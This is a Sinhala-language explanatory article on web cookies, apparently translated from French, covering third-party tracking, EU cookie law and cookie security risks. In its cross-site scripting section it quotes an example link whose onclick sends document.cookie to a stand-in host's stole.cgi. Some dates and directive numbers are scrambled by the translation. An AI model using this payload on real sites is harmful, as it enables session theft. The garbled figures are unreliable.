• බ්‍රවුසරයේ ලිපින තීරුවේ javascript: alert(document.cookie) ඇතුළත් කිරීමෙන් ලබා දී ඇති පිටුවක ක්‍රියාකාරී කුකීස් බැලීමට පරිශීලකයාට ඉඩ දෙන්න. සමහර බ්‍රවුසර වල දැනට බ්‍රවුසරය මගින් ගබඩා කර ඇති කුකීස් බැලීමට සහ තෝරා බේරා මකා දැමිය හැකි පරිශීලකයා සඳහා කුකී කළමනාකරුවෙකු ඇතුළත් කරයි.

බොහෝ බ්‍රව්සර් කුකීස් ඇතුළත් පුද්ගලික දත්ත සම්පූර්ණයෙන් මකා දැමීමට ද ඉඩ දෙයි. කුකී අවසර පාලනය කිරීමට අමතර මොඩියුල ද පවතී.

පුද්ගලිකත්වය සහ තෙවන පාර්ශවීය කුකීස්

මෙම මනඃකල්පිත උදාහරණයේ දී, වෙළඳ දැන්වීම් සමාගමක් වෙබ් අඩවි දෙකක බැනර් තබා ඇත. එහි සේවාදායකයන් මත බැනර් සත්කාරකත්වය සහ තෙවන පාර්ශ්ව කුකීස් භාවිතා කිරීමෙන්, වෙළඳ දැන්වීම් සමාගමට මෙම අඩවි දෙක හරහා පරිශීලකයාගේ සංචලනය නිරීක්ෂණය කිරීමට හැකි වේ.

කුකීස් වෙබ් පරිශීලකයින්ගේ පෞද්ගලිකත්වය සහ නිර්නාමිකභාවය සඳහා වැදගත් ඇඟවුම් ඇත. කුකීස් ආපසු යවනු ලබන්නේ ඒවා සකසන ලද සේවාදායකයට හෝ එකම අන්තර්ජාල වසමට අයත් සේවාදායකයකට පමණක් වුවද, වෙබ් පිටුවක කෙසේ වෙතත් වෙනත් වසම්වලට අයත් සේවාදායකයන්හි ගබඩා කර ඇති පින්තූර හෝ වෙනත් සංරචක අඩංගු විය හැකිය. මෙම බාහිර සංරචක ප්රතිසාධනය කිරීමේදී පිහිටුවා ඇති කුකීස් ලෙස හැඳින්වේ තෙවන පාර්ශවීය කුකීස්. මෙයට අනවශ්‍ය උත්පතන කවුළු වලින් කුකීස් ඇතුළත් වේ.

වෙළඳ ප්‍රචාරණ සමාගම් ඔවුන් පිවිසෙන විවිධ වෙබ් අඩවි හරහා පරිශීලකයන් නිරීක්ෂණය කිරීමට තෙවන පාර්ශවීය කුකීස් භාවිතා කරයි. විශේෂයෙන්, වෙළඳ ප්‍රචාරණ සමාගමකට ප්‍රචාරණ රූප හෝ ලුහුබැඳීමේ පික්සලයක් තබා ඇති සියලුම පිටු හරහා පරිශීලකයෙකු නිරීක්ෂණය කළ හැකිය. පරිශීලකයා විසින් නැරඹූ පිටු පිළිබඳ දැනුම පරිශීලකයාගේ වෙළඳ ප්‍රචාරණ මනාපයන් ඉලක්ක කර ගැනීමට වෙළඳ ප්‍රචාරක සමාගමට ඉඩ සලසයි.

පරිශීලක පැතිකඩක් ගොඩනැගීමේ හැකියාව සමහර අය විසින් පුද්ගලිකත්ව ආක්‍රමණයක් ලෙස සලකයි, විශේෂයෙන්ම තෙවන පාර්ශවීය කුකීස් භාවිතයෙන් විවිධ වසම් හරහා ලුහුබැඳීම සිදු කරන විට. මේ හේතුව නිසා සමහර රටවල කුකී නීති ඇත.

ධවල මන්දිර ඖෂධ ප්‍රතිපත්ති කාර්යාලය අන්තර්ජාලය ඔස්සේ මත්ද්‍රව්‍ය වෙළඳ දැන්වීම් නරඹන පරිශීලකයින්ගේ පරිගණක නිරීක්ෂණය කිරීම සඳහා කුකීස් භාවිතා කරන බව අනාවරණය වීමෙන් පසු එක්සත් ජනපද රජය 2000 දී කුකීස් ස්ථානගත කිරීම සම්බන්ධයෙන් දැඩි නීති ක්‍රියාත්මක කළේය. 2002 දී, රහස්‍යතා ක්‍රියාකාරිකයෙකු වන Daniel Brandt විසින් CIA විසින් එහි වෙබ් අඩවි වෙත ගිය පරිගණකවල නොනැසී පවතින කුකීස් තැබූ බව සොයා ගන්නා ලදී. මෙම කඩකිරීම පිළිබඳව දැනුම් දුන් පසු, CIA මෙම කුකීස් හිතාමතාම එවා නැති බව ප්‍රකාශ කර ඒවා සැකසීම නතර කළේය. 25 දෙසැම්බර් 2005 වන දින, ජාතික ආරක්ෂක ඒජන්සිය (NSA) විසින් මෘදුකාංග යාවත්කාලීන කිරීමක් හේතුවෙන් අමුත්තන්ගේ පරිගණක මත නොනැසී පවතින කුකීස් දෙකක් තබා ඇති බව බ්‍රැන්ඩ්ට් සොයා ගන්නා ලදී. දැනුම් දීමෙන් පසු, NSA වහාම කුකීස් අක්‍රීය කළේය.

එක්සත් රාජධානියේ, ද කුකී නීතිය “, 25 මැයි 2012 දින සිට බලාත්මක කරන ලද, වෙබ් අඩවි ඔවුන්ගේ අභිප්‍රායන් ප්‍රකාශ කිරීමට බැඳී සිටින අතර, එමඟින් පරිශීලකයින්ට අන්තර්ජාලයේ ඔවුන්ගේ ඡේදයේ හෝඩුවාවන් තැබීමට අවශ්‍යද නැද්ද යන්න තෝරා ගැනීමට ඉඩ සලසයි. එමගින් ඔවුන් වෙළඳ දැන්වීම් ඉලක්ක කිරීමෙන් ආරක්ෂා කර ගත හැක. කෙසේ වුවද, අනුව ආරක්ෂකයා, අන්තර්ජාල භාවිතා කරන්නන්ගේ කැමැත්ත අනිවාර්යයෙන්ම පැහැදිලි නැත; පරිශීලක අනුමැතියේ නියමයන්ට වෙනස්කම් සිදු කර ඇත මෙසේ ඇඟවුම් කර ඇත.

පෞද්ගලිකත්වය පිළිබඳ නියෝගය 2002/58

විධාන 202/58 පෞද්ගලිකත්වය සහ ඉලෙක්ට්‍රොනික සන්නිවේදනය, කුකීස් භාවිතය පිළිබඳ නීති අඩංගු වේ. විශේෂයෙන්ම, මෙම නියෝගයේ 5 වැනි වගන්තිය, 3 වැනි ඡේදය මඟින් පරිශීලකයාගේ පරිගණකයේ දත්ත ගබඩා කිරීම (කුකීස් වැනි) සිදු කළ හැක්කේ නම් පමණි:

• දත්ත භාවිතා කරන ආකාරය ගැන පරිශීලකයාට දැනුම් දෙනු ලැබේ;
• පරිශීලකයාට මෙම ගබඩා මෙහෙයුම ප්‍රතික්ෂේප කිරීමේ විකල්පය ලබා දී ඇත. කෙසේ වෙතත් තාක්ෂණික හේතූන් මත දත්ත ගබඩා කිරීම මෙම නීතියෙන් නිදහස් කරන බවද මෙම ලිපියේ සඳහන් වේ.

2003 ඔක්තෝම්බර් මාසයේ සිට ක්‍රියාත්මක කිරීමට නියමිතව තිබූ මෙම නියෝගය 2004 දෙසැම්බර් වාර්තාවට අනුව ඉතා අසම්පූර්ණ ලෙස ක්‍රියාවට නංවා ඇති අතර, ඇතැම් සාමාජික රටවල් (ස්ලෝවැකියාව, ලැට්වියාව, ග්‍රීසිය, බෙල්ජියම සහ ලක්සම්බර්ග්) තවමත් ප්‍රතිස්ථාපනය කර නොමැති බව පෙන්වා දුන්නේය. දේශීය නීතියට නියෝගය.

29 දී G2010 හි මතයට අනුව, අන්තර්ජාල පරිශීලකයාගේ පැහැදිලි කැමැත්ත මත චර්යාත්මක වෙළඳ ප්‍රචාරණ අරමුණු සඳහා කුකීස් භාවිතය විශේෂයෙන් කොන්දේසි සහිත මෙම නියෝගය ඉතා දුර්වල ලෙස ක්‍රියාත්මක වේ. ඇත්ත වශයෙන්ම, බොහෝ වෙබ් අඩවි එසේ කරන්නේ, "තාක්ෂණික" කුකීස් අතර වෙනසකින් තොරව, භාවිතයන් පිළිබඳ තොරතුරු ලබා නොදී, "කුකීස්" භාවිතය පිළිබඳ සරල "බැනරයකට" සීමා කිරීමෙන්, නියෝගයට අනුකූල නොවන ආකාරයට ය. "ලුහුබැඳීම" කුකීස්, හෝ තාක්ෂණික කුකීස් (සාප්පු කරත්ත කළමනාකරණ කුකීස් වැනි) නඩත්තු කිරීමට කැමති පරිශීලකයාට සැබෑ තේරීමක් පිරිනැමීමට සහ "ලුහුබැඳීම" කුකීස් ප්‍රතික්ෂේප කිරීමට. ඇත්ත වශයෙන්ම, කුකීස් ප්‍රතික්ෂේප කළහොත් බොහෝ වෙබ් අඩවි නිවැරදිව ක්‍රියා නොකරයි, එය 2002/58 විධානයට හෝ 95/46 විධානයට (පුද්ගලික දත්ත ආරක්ෂා කිරීම) අනුකූල නොවේ.

නියෝගය 2009/136/CE

2009 නොවැම්බර් 136 දිනැති Directive 25/2009/EC මගින් මෙම ද්‍රව්‍ය යාවත්කාලීන කර ඇති අතර එහි සඳහන් වන්නේ "තොරතුරු ගබඩා කිරීම හෝ ග්‍රාහකයෙකුගේ හෝ පරිශීලකයෙකුගේ පර්යන්ත උපකරණවල දැනටමත් ගබඩා කර ඇති තොරතුරු වෙත ප්‍රවේශය ලබා ගැනීම සඳහා අවසර දෙනු ලබන්නේ කොන්දේසිය මත පමණි. ග්‍රාහකයා හෝ පරිශීලකයා විසින් 95/46/EC විධානයට අනුකූලව, පිරිසැකසුම් කිරීමේ අරමුණු සම්බන්ධයෙන් පැහැදිලි සහ සම්පූර්ණ තොරතුරු ලැබීමෙන් පසු ඔහුගේ කැමැත්ත ලබා දී ඇත. එබැවින් නව නියෝගය අන්තර්ජාල පරිශීලකයාගේ පරිගණකයේ කුකීස් තැබීමට පෙර බැඳීම් ශක්තිමත් කරයි.

විධානයේ මූලික සලකා බැලීම් වලදී, යුරෝපීය නීති සම්පාදකයා කෙසේ වෙතත් සඳහන් කරයි: "තාක්ෂණිකව හැකි සහ ඵලදායී නම්, විධාන 95/46/EC හි අදාළ විධිවිධානවලට අනුකූලව, සැකසීම සම්බන්ධයෙන් පරිශීලකයාගේ කැමැත්ත ප්‍රකාශ කළ හැක. බ්රවුසරයක හෝ වෙනත් යෙදුමක සුදුසු සැකසුම් භාවිතා කිරීම". නමුත් ඇත්ත වශයෙන්ම, මේ දක්වා කිසිදු බ්‍රවුසරයකින් අත්‍යවශ්‍ය තාක්ෂණික කුකීස් විකල්ප ඒවායින් විසන්ධි කිරීමට නොහැකි වන අතර ඒවා පරිශීලකයාගේ තේරීමට ඉතිරි කළ යුතුය.

මෙම නව නියෝගය බෙල්ජියම් මන්ත්‍රීවරුන් විසින් 2012 ජූලි මාසයේදී මාරු කරන ලදී. 2014 අධ්‍යයනයකින් පෙන්නුම් කරන්නේ මන්ත්‍රීවරුන් පවා අයදුම් කිරීමට වෙහෙසෙන බවයි. නියෝගයේ සීමාවන්.

P3P

P3P පිරිවිතරයට සේවාදායකයකට රහස්‍යතා ප්‍රතිපත්තියක් ප්‍රකාශ කිරීමේ හැකියාව ඇතුළත් වේ, එය කුමන ආකාරයේ තොරතුරු රැස් කරන්නේද සහ කුමන අරමුණක් සඳහාද යන්න නිර්වචනය කරයි. මෙම ප්‍රතිපත්තිවලට කුකීස් භාවිතයෙන් එකතු කරන ලද තොරතුරු භාවිතය ඇතුළත් (නමුත් ඒවාට සීමා නොවේ). P3P හි නිර්වචනවලට අනුව, බ්‍රවුසරයකට රහස්‍යතා ප්‍රතිපත්ති පරිශීලකයාගේ මනාපයන් සමඟ සංසන්දනය කිරීමෙන් හෝ පරිශීලකයාගෙන් විමසීමෙන්, සේවාදායකය විසින් ප්‍රකාශිත රහස්‍යතා ප්‍රතිපත්ති රහස්‍යතා ප්‍රකාශය ඉදිරිපත් කිරීමෙන් කුකීස් පිළිගැනීමට හෝ ප්‍රතික්ෂේප කිරීමට හැකිය.

Apple Safari සහ Microsoft Internet Explorer අනුවාද 6 සහ 7 ඇතුළු බොහෝ බ්‍රව්සර් P3P සඳහා සහය දක්වන අතර එමඟින් බ්‍රවුසරයට තෙවන පාර්ශවීය කුකී ගබඩාව පිළිගත යුතුද යන්න තීරණය කිරීමට ඉඩ සලසයි. ඔපෙරා බ්‍රවුසරය පරිශීලකයින්ට තෙවන පාර්ශවීය කුකීස් ප්‍රතික්ෂේප කිරීමට සහ අන්තර්ජාල වසම් සඳහා ගෝලීය සහ විශේෂිත ආරක්ෂක පැතිකඩක් නිර්මාණය කිරීමට ඉඩ සලසයි. Mozilla Firefox අනුවාදය 2 P3P සහාය අතහැර දැමූ නමුත් එය 3 අනුවාදයේ නැවත ස්ථාපනය කරන ලදී.

පරිශීලකයාගේ වෙබ් අත්දැකීමට සෘණාත්මක බලපෑමක් නොකර, පුද්ගලිකත්වය වැඩි කිරීමට සහ දැන්වීම් ලුහුබැඳීම අඩු කිරීමට බොහෝ බ්‍රව්සර් මගින් තෙවන පාර්ශවීය කුකීස් අවහිර කළ හැක. බොහෝ වෙළඳ දැන්වීම් ආයතන විකල්පයක් ඉදිරිපත් කරයි හැර යන්න ඉලක්කගත වෙළඳ ප්‍රචාරණයට, මෙම ඉලක්ක කිරීම අක්‍රිය කරන සාමාන්‍ය කුකියක් බ්‍රවුසරයේ පිහිටුවීමෙන්, නමුත් එවැනි විසඳුමක් ප්‍රායෝගිකව ඵලදායී නොවේ, එය ගරු කරන විට, මෙම සාමාන්‍ය කුකිය පරිශීලකයා විසින් තේරීම අවලංගු කරන මෙම කුකීස් මකා දැමූ වහාම මකා දමන බැවිනි. පිටත තීරණය.

කුකීස් වල අවාසි

රහස්‍යතා ගැටළු වලට අමතරව, කුකීස් වල තාක්ෂණික දුර්වලතා ද ඇත. විශේෂයෙන්ම, ඔවුන් සෑම විටම පරිශීලකයන් නිවැරදිව හඳුනා නොගනී, විශාල සංඛ්යාවක් සිටින විට, ඔවුන් ආරක්ෂක ප්රහාර සඳහා භාවිතා කළ හැකි අතර, ඔවුන් මෘදුකාංගයේ වාස්තුවිද්යාත්මක විලාසය, නියෝජිත රාජ්ය හුවමාරුව සමඟ ගැටෙන විට වෙබ් අඩවියේ ක්රියාකාරිත්වය මන්දගාමී කළ හැකිය.

අපැහැදිලි හඳුනා ගැනීම

පරිගණකයක බ්‍රව්සර් එකකට වඩා භාවිතා කරන්නේ නම්, ඒ සෑම එකක් තුළම කුකීස් සඳහා වෙනම ගබඩා ඒකකයක් ඇත. එබැවින් කුකීස් පුද්ගලයෙකු හඳුනා නොගනී, නමුත් පරිශීලක ගිණුමක්, පරිගණකයක් සහ වෙබ් බ්‍රව්සරයක එකතුවකි. මේ අනුව, ඕනෑම අයෙකුට මෙම ගිණුම්, පරිගණක, හෝ කුකීස්වල තොරණ ඇති බ්‍රවුසර භාවිතා කළ හැක. ඒ හා සමානව, කුකීස් "අන්තර්ජාල කැෆේ" හෝ පරිගණක සම්පත් සඳහා නොමිලේ ප්‍රවේශය ලබා දෙන ඕනෑම ස්ථානයක වැනි එකම පරිශීලක ගිණුම, පරිගණකය සහ බ්‍රවුසරය බෙදා ගන්නා බහු පරිශීලකයින් අතර වෙනස හඳුනා නොගනී.

නමුත් ප්‍රායෝගිකව මෙම ප්‍රකාශය බොහෝ අවස්ථාවලදී සාවද්‍ය බව පෙනී යන්නේ අද "පුද්ගලික" පරිගණකයක් (හෝ ස්මාර්ට් ජංගම දුරකතනයක් හෝ ටැබ්ලට් පරිගණකයක්, වඩාත් නරක අතට හැරෙන) තනි පුද්ගලයෙකු විසින් ප්‍රධාන වශයෙන් භාවිතා කරන බැවිනි.මෙය නිශ්චිත පුද්ගලයෙකු ඉලක්ක කර ගැනීමකි. පුද්ගලයා "එනම්" හඳුනා නොගත්තද, එකතු කරන ලද තොරතුරු පරිමාව හරහා පුද්ගලාරෝපිත ඉලක්ක වෙත පැමිණේ.

කුකීස් සොරකම් කිරීම

ජාලයේ වෙනත් පරිගණකයකින් කුකියක් සොරකම් කළ හැකිය.

සාමාන්‍ය ක්‍රියාකාරිත්වය අතරතුර, කුකීස් සේවාදායකය (හෝ එකම වසමේ ඇති සේවාදායකයන් සමූහයක්) සහ පරිශීලකයාගේ පරිගණක බ්‍රවුසරය අතර ආපසු යවනු ලැබේ. කුකීස් වල සංවේදී තොරතුරු (පරිශීලක නාමය, සත්‍යාපනය සඳහා භාවිතා කරන මුරපදය, ආදිය) අඩංගු විය හැකි බැවින්, ඒවායේ අගයන් වෙනත් පරිගණකවලට ප්‍රවේශ විය නොහැක. කුකී සොරකම යනු අනවසර තෙවන පාර්ශවයක් විසින් කුකීස් වලට බාධා කිරීමේ ක්‍රියාවකි.

සැසි පැහැර ගැනීමක් ලෙස හැඳින්වෙන ප්‍රහාරයකදී පැකට් ස්නයිෆර් හරහා කුකීස් සොරකම් කළ හැක. (විශේෂයෙන් සංකේතනය නොකළ පොදු Wi-Fi අවකාශය මත) යැවීම සහ ලැබීම හැර වෙනත් පරිගණක මගින් ජාලයේ ගමනාගමනය බාධා කර කියවීමට හැකිය. මෙම තදබදයට සරල HTTP ප්‍රොටෝකෝලය භාවිතයෙන් සැසි හරහා යැවූ කුකීස් ඇතුළත් වේ. ජාල ගමනාගමනය සංකේතනය කර නොමැති විට, අනිෂ්ට පරිශීලකයින්ට "පැකට් ස්නිෆර්" භාවිතයෙන් ජාලයේ අනෙකුත් පරිශීලකයින්ගේ සන්නිවේදනයන් කියවිය හැකිය.

HTTPS ප්‍රොටෝකෝලය භාවිතයෙන් පරිශීලකයාගේ පරිගණකය සහ සේවාදායකය අතර සම්බන්ධතාවය සංකේතනය කිරීමෙන් මෙම ගැටළුව ජය ගත හැකිය. සේවාදායකයකට a සඳහන් කළ හැක ආරක්ෂිත ධජය කුකියක් සැකසීමේදී; බ්‍රවුසරය එය යවන්නේ SSL සම්බන්ධතාවයක් වැනි ආරක්ෂිත රේඛාවක් හරහා පමණි.

කෙසේ වෙතත්, බොහෝ වෙබ් අඩවි, පරිශීලක සත්‍යාපනය සඳහා (එනම් පිවිසුම් පිටුව) සඳහා HTTPS සංකේතාත්මක සන්නිවේදනය භාවිතා කළද, පසුව කාර්යක්ෂමතා හේතූන් මත සංකේතනය නොකළ HTTP සම්බන්ධතා හරහා සැසි කුකීස් සහ අනෙකුත් දත්ත සාමාන්‍ය පරිදි යවයි. මෙලෙස ප්‍රහාරකයන්ට වෙනත් පරිශීලකයන්ගේ කුකීස්වලට බාධා කර ඒවා සුදුසු වෙබ් අඩවිවල පෙනී සිටීමට හෝ කුකී ප්‍රහාරවලදී ඒවා භාවිත කිරීමට හැකිය.

වෙබ් අඩවියේ ස්ක්‍රිප්ට් කිරීම: සේවාදායකය සහ සේවාලාභියා අතර පමණක් හුවමාරු කළ යුතු කුකියක් වෙනත් තෙවන පාර්ශවයකට යවනු ලැබේ.

කුකීස් සොරකම් කිරීමට තවත් ක්‍රමයක් නම් ස්ක්‍රිප්ට් අඩවි සහ බ්‍රවුසරය විසින්ම කුකීස් කිසිදා නොලැබෙන අනිෂ්ට සේවාදායක වෙත යැවීමයි. නවීන බ්‍රවුසර මඟින් සේවාදායකයෙන් අවශ්‍ය කේත කොටස් ක්‍රියාත්මක කිරීමට ඉඩ ලබා දේ. ධාවන කාලය තුළ කුකීස් වෙත ප්‍රවේශ වන්නේ නම්, ඒවායේ අගයන් ඒවාට ප්‍රවේශ නොවිය යුතු සේවාදායකයන් වෙත යම් ආකාරයකින් සන්නිවේදනය කළ හැකිය. ජාලය හරහා යැවීමට පෙර කුකීස් සංකේතනය කිරීම ප්‍රහාරය වළක්වා ගැනීමට උපකාරී නොවේ.

HTML අන්තර්ගතය පළ කිරීමට පරිශීලකයින්ට ඉඩ සලසන අඩවි වල ප්‍රහාරකයින් විසින් මෙම ආකාරයේ වෙබ් අඩවියේ ස්ක්‍රිප්ටින් සාමාන්‍යයෙන් භාවිතා කරයි. HTML දායකත්වය තුළ අනුකූල කේතයේ කොටසක් ඒකාබද්ධ කිරීමෙන්, ප්‍රහාරකයෙකුට වෙනත් පරිශීලකයින්ගෙන් කුකීස් ලබා ගත හැක. මෙම කුකීස් පිළිබඳ දැනුම සොරකම් කරන ලද කුකීස් භාවිතා කරමින් එම වෙබ් අඩවියට සම්බන්ධ වීමෙන් භාවිතා කළ හැකි අතර එමඟින් කුකීස් සොරකම් කළ පරිශීලකයා ලෙස හඳුනා ගැනේ.

එවැනි ප්‍රහාර වැලැක්වීමට එක් ක්‍රමයක් නම් HttpOnly ධජය භාවිතා කිරීමයි; එය PHP හි Internet Explorer හි 6 වන අනුවාදයේ සිට 5.2.0 අනුවාදයේ සිට හඳුන්වා දී ඇති විකල්පයකි, එය ස්ක්‍රිප්ටයට ආසන්න සේවාදායකයාට කුකියට ප්‍රවේශ විය නොහැකි කිරීමට සැලසුම් කර ඇත. කෙසේ වෙතත්, වෙබ් සංවර්ධකයින් ඔවුන්ගේ වෙබ් අඩවි සංවර්ධනයේදී මෙය සැලකිල්ලට ගත යුතු අතර එමඟින් ඔවුන් වෙබ් අඩවියේ ස්ක්‍රිප්ට් කිරීමට ප්‍රතිශක්තිකරණ වේ.

භාවිතා කරන තවත් ආරක්ෂක තර්ජනයක් වන්නේ වෙබ් අඩවියේ ඉල්ලුම සැකසීමයි.

නිල තාක්ෂණික පිරිවිතර කුකීස් ආපසු යැවීමට ඉඩ දෙන්නේ ඒවා ආරම්භ වූ වසමේ සේවාදායකයන් වෙත පමණි. කෙසේ වෙතත්, කුකීස් වල අගය කුකී ශීර්ෂයන් හැර වෙනත් ක්‍රම භාවිතා කරමින් වෙනත් සේවාදායකයන් වෙත යැවිය හැක.

විශේෂයෙන්ම, ජාවාස්ක්‍රිප්ට් වැනි ස්ක්‍රිප්ටින් භාෂාවලට සාමාන්‍යයෙන් කුකී අගයන් වෙත ප්‍රවේශ වීමට අවසර දී ඇති අතර අන්තර්ජාලයේ ඕනෑම සේවාදායකයකට අත්තනෝමතික අගයන් යැවීමට හැකියාව ඇත. මෙම ස්ක්‍රිප්ට් කිරීමේ හැකියාව භාවිතා කරනුයේ අනෙකුත් පරිශීලකයින්ට බැලීම සඳහා HTML අන්තර්ගතයන් පළ කිරීමට පරිශීලකයින්ට ඉඩ සලසන වෙබ් අඩවි වලින්ය.

උදාහරණයක් ලෙස, example.com වසම මත ක්‍රියාත්මක වන ප්‍රහාරකයෙකු ඔවුන් පාලනය නොකරන ජනප්‍රිය බ්ලොගයක් වෙත යොමු කරමින් පහත සබැඳිය අඩංගු අදහසක් පළ කළ හැක:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

වෙනත් පරිශීලකයෙකු මෙම සබැඳිය මත ක්ලික් කළ විට, බ්‍රවුසරය කේතයේ onclick ගුණාංග කොටස ක්‍රියාත්මක කරයි, එබැවින් එය මෙම පිටුව සඳහා සක්‍රිය පරිශීලක කුකී ලැයිස්තුව සමඟ document.cookie තන්තුව ප්‍රතිස්ථාපනය කරයි. එමනිසා, මෙම කුකීස් ලැයිස්තුව example.com සේවාදායකය වෙත යවනු ලබන අතර, ප්‍රහාරකයාට මෙම පරිශීලකයාගේ කුකීස් එකතු කිරීමට හැකි වේ.

ස්ක්‍රිප්ට් පැමිණෙන්නේ කුකිය සැකසූ එකම වසමකින් වන නිසාත්, අගයන් යැවීමේ ක්‍රියාව එම වසම විසින් අනුමත කර ඇති නිසාත්, පරිශීලක පාර්ශවයෙන් මෙවැනි ප්‍රහාරයක් හඳුනා ගැනීම අපහසුය. අනිෂ්ට කේත ප්‍රකාශනය වැළැක්වීමේ සීමාවන් පැනවීම මෙවැනි වෙබ් අඩවි ක්‍රියාත්මක කරන පරිපාලකයින්ගේ වගකීමක් බව සැලකේ.

කුකීස් HttpOnly ධජය සමඟ යවනු ලැබුවේ නම්, JavaScript වැනි සේවාලාභී පාර්ශවීය වැඩසටහන්වලට සෘජුවම නොපෙනේ. සේවාදායකයේ දෘෂ්ටි කෝණයෙන්, එකම වෙනස වන්නේ Set-Cookie ශීර්ෂයේ පේළියේ HttpOnly තන්තුව අඩංගු නව ක්ෂේත්‍රයක් එක් කිරීමයි:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

බ්‍රවුසරයට එවැනි කුකියක් ලැබුණු විට, එය සාමාන්‍යයෙන් පහත HTTP හුවමාරුවේදී එය භාවිතා කළ යුතු නමුත්, සේවාලාභියාගේ පැත්තෙන් ක්‍රියාත්මක කරන ලද ස්ක්‍රිප්ට්වලට එය දෘශ්‍යමාන නොකර. HttpOnly ධජය කිසිදු නිල තාක්ෂණික පිරිවිතරයක කොටසක් නොවන අතර, සියලුම බ්‍රව්සර් වල ක්‍රියාත්මක නොවේ. XMLHTTPRequest ක්‍රමය මගින් සැසි කුකීස් කියවීම සහ ලිවීම වැලැක්වීමට දැනට ක්‍රමයක් නොමැති බව සලකන්න.

අන්තර්ගතය වෙනස් කිරීම: ප්‍රහාරකයෙකු අවලංගු කුකියක් සේවාදායකයකට යවයි, සමහරවිට සේවාදායකය විසින් එවන ලද වලංගු කුකියකින් සාදා ඇත.

කුකීස් වෙනස් කිරීම

කුකීස් ගබඩා කර වෙනස් නොවී සේවාදායකය වෙත ආපසු යැවීමට අවශ්‍ය වූ වහාම, ප්‍රහාරකයෙකුට නැවත සේවාදායකය වෙත යැවීමට පෙර කුකීස්වල අගය වෙනස් කළ හැක. උදාහරණයක් ලෙස, කුකියක ගබඩාවේ සාප්පු කරත්තයේ තබා ඇති අයිතම සඳහා ගෙවිය යුතු සම්පූර්ණ වටිනාකම කුකියේ තිබේ නම්, මෙම අගය වෙනස් කිරීම ආරම්භක මිලට වඩා අඩුවෙන් ප්‍රහාරකයාගෙන් අය කිරීමේ අවදානමට සේවාදායකයට නිරාවරණය වේ. කුකීස් වල අගය වෙනස් කිරීමේ ක්‍රියාවලිය ලෙස හැඳින්වේ කුකී විෂ වීම සහ ප්‍රහාරය ස්ථීර කිරීමට කුකී සොරකම් කිරීමෙන් පසුව භාවිතා කළ හැක.

කුකී ප්‍රතික්‍ෂේප කිරීමේ ක්‍රමයේදී, ප්‍රහාරකයා වලංගු නොවන කුකියක් සේවාදායකය වෙත යැවීමට බ්‍රවුසර දෝෂයක් ගසාකයි.

කෙසේ වෙතත්, බොහෝ වෙබ් අඩවි, සැසි හැඳුනුම්පතක් පමණක් ගබඩා කරයි - සැසි පරිශීලකයා හඳුනා ගැනීමට භාවිතා කරන අහඹු ලෙස ජනනය කරන ලද අද්විතීය අංකයක් - කුකියේම, අනෙක් සියලුම තොරතුරු සේවාදායකයේ ගබඩා කර ඇත. මෙම අවස්ථාවේ දී, මෙම ගැටළුව බොහෝ දුරට විසඳා ඇත.

වෙබ් අඩවි අතර කුකී හැසිරවීම

සෑම වෙබ් අඩවියකටම තමන්ගේම කුකීස් ඇතැයි අපේක්ෂා කෙරේ, එබැවින් එක් අඩවියකට වෙනත් වෙබ් අඩවියකට සම්බන්ධ කුකීස් වෙනස් කිරීමට හෝ නිර්මාණය කිරීමට නොහැකි විය යුතුය. වෙබ් බ්‍රවුසරයේ ආරක්‍ෂක දෝෂයක් මෙම රීතිය බිඳ දැමීමට අනිෂ්ට අඩවිවලට ඉඩ දිය හැක. එවැනි දෝෂයක් සූරාකෑම සාමාන්යයෙන් හඳුන්වනු ලැබේ හරස් අඩවියේ ආහාර පිසීම. එවැනි ප්‍රහාරවල අරමුණ සැසි හැඳුනුම්පත සොරකම විය හැකිය.

පරිශීලකයන් මෙම දුර්වලතා පාහේ ඉවත් කර ඇති වෙබ් බ්‍රව්සර්වල නවතම අනුවාදයන් භාවිතා කළ යුතුය.

සේවාදායකයා සහ සේවාදායකයා අතර ගැටුම්කාරී තත්ත්වය

කුකීස් භාවිතය සේවාදායකයාගේ තත්වය සහ කුකියේ ගබඩා කර ඇති තත්වය අතර පරස්පරතාවයක් ඇති කළ හැකිය. පරිශීලකයා කුකියක් ලබාගෙන බ්‍රවුසරයේ "ආපසු" බොත්තම ක්ලික් කළහොත්, බ්‍රවුසරයේ තත්වය සාමාන්‍යයෙන් මෙම අත්පත් කර ගැනීමට පෙර මෙන් නොවේ. උදාහරණයක් ලෙස, අන්තර්ජාල වෙළඳසැලක කූඩය කුකීස් භාවිතයෙන් නිර්මාණය කර ඇත්නම්, පරිශීලකයා බ්‍රවුසර ඉතිහාසයට ආපසු යන විට කූඩයේ අන්තර්ගතය වෙනස් කළ නොහැක: පරිශීලකයා තම කූඩයට ලිපියක් එක් කිරීමට බොත්තමක් එබීමෙන් සහ "ආපසු යන්න" මත ක්ලික් කළහොත් "බොත්තම, ලිපිය මෙහි පවතී. ලිපිය එකතු කිරීම අවලංගු කිරීමට නිසැකවම අවශ්‍ය පරිශීලකයාගේ අභිප්‍රාය මෙය නොවිය හැකිය. මෙය අවිශ්වාසය, ව්යාකූලත්වය සහ දෝෂ වලට හේතු විය හැක. එබැවින් වෙබ් සංවර්ධකයින් මෙම ගැටළුව පිළිබඳව දැනුවත් විය යුතු අතර මෙවැනි තත්වයන් හැසිරවීමට පියවරයන් ක්රියාත්මක කළ යුතුය.

කුකී කල් ඉකුත්වීම

ස්ථීර කුකීස් ඉක්මනින් කල් ඉකුත් වීමට සකසා නොතිබීම නිසා පුද්ගලිකත්ව ආරක්‍ෂක විශේෂඥයින් විසින් විවේචනයට ලක් කර ඇත, එමගින් වෙබ් අඩවි වලට පරිශීලකයින් හඹා යාමට සහ කාලයත් සමඟ ඔවුන්ගේ පැතිකඩ ගොඩනැගීමට ඉඩ සලසයි. කුකීස් වල මෙම අංගය සැසි පැහැරගැනීමේ ගැටලුවේ කොටසකි, මන්ද සොරකම් කරන ලද නොනැසී පවතින කුකියක් පරිශීලකයෙකු ලෙස සැලකිය යුතු කාලයක් භාවිතා කළ හැක.

කියවීමටද: ගෆාම්: ඔවුන් කවුද? ඔවුන් (සමහර විට) එතරම් බියජනක වන්නේ ඇයි?

කුකීස් සඳහා විකල්ප

